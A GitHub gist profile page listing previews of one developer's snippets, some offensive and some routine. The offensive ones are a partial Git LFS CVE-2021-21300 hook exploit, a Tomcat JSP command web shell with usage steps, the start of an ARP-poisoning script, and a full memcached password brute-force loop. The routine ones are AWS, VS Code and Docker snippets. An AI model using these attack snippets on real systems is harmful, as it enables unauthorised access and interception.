Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Working from home

Julio Silveira Melo juliosmelo

🏠
Working from home
  • SOLVD
  • Blue earth
View GitHub Profile
View CVE-2021-21300-exploit
#!/bin/sh
git init delayed-checkout &&
(
cd delayed-checkout &&
echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
>.gitattributes &&
mkdir A &&
printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
chmod +x A/post-checkout &&
@juliosmelo
juliosmelo / cve-2007-1860
Created Nov 6, 2020
Tomcat CVE-2007-1960 backdoor
View cve-2007-1860
# how to use
# build
# $ jar -cvf index.war *
# upload to tomacat server
# execute
# http://taget/%252e%252e/%252e%252e/cve-2007-1860/index.jsp?cmd=ls
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
@juliosmelo
juliosmelo / gist:d1f6a0dccf9be4428dca855c185e6367
Created Sep 25, 2020
Python script for ARP poison attacks
View gist:d1f6a0dccf9be4428dca855c185e6367
import os
import sys
import threading
import signal
from scapy.all import *
HWDST_SRC = "ff:ff:ff:ff:ff:ff"
interface = ""
target_ip = ""
View fuckUOLChat.js
var timex = setInterval(sendFuckingMsg, 30000);
function sendFuckingMsg(){
productName = "ESPN Ilimitado";
uolPersonName = document.getElementById("Span1").textContent;
textField = document.getElementById("message");
button = document.getElementsByClassName("vinter-button vinter-quest-btnSend")[0];
textField.value = "Oi" + uolPersonName + "Não estou interessado. Quero CANCELAR o " + productName + "!";
button.click();
}
View memcached-dictonary-attack.sh
#! /bin/bash
while read F ; do
echo "Trying $F"
if memcstat --servers=$1 --username=$2 --password=$F | grep -q Server ; then
echo "Password Found: "$F
break
fi
done < $3
@juliosmelo
juliosmelo / get-lambdas.sh
Created Dec 30, 2019
Simple script to download all AWS Lambad functions in a given region
View get-lambdas.sh
#!/bin/bash
aws_region='us-east-1'
functions=$(aws lambda list-functions --region us-east-1 | jq -r '.Functions[].FunctionName')
for function in $functions; do
datetime=$(date)
echo "[$datetime] Downloading Lambda $function"
function_url=$(aws lambda get-function --function-name $function --query 'Code.Location' --region $aws_region)
url=$(echo $function_url | tr -d '"')
View vsc_js_snippets.json
{
"Console Log": {
"prefix": "cl",
"body": "console.log($1);",
"description": "Console Log"
},
"Named Function": {
"prefix": "nfn",
"body": ["function ${1:functionName}($2) {", " $3", "}"],
"description": "Named Function"
@juliosmelo
juliosmelo / vsc-awesome-extensions.sh
Created Aug 13, 2019
Just a list of cool vsc extensions.
View vsc-awesome-extensions.sh
#!/bin/bash
code --install-extension andys8.jest-snippets
code --install-extension christian-kohler.npm-intellisense
code --install-extension christian-kohler.path-intellisense
code --install-extension cssho.vscode-svgviewer
code --install-extension dbaeumer.vscode-eslint
code --install-extension donjayamanne.githistory
code --install-extension dracula-theme.theme-dracula
code --install-extension eamodio.gitlens
code --install-extension EditorConfig.EditorConfig
View S3 static hosting buket policy
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "AllowPublicRead",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "s3:GetObject",
@juliosmelo
juliosmelo / Dockerfile
Created Dec 21, 2016 — forked from yefim/Dockerfile
Build a Docker image, push it to AWS EC2 Container Registry, then deploy it to AWS Elastic Beanstalk
View Dockerfile
# Example Dockerfile
FROM hello-world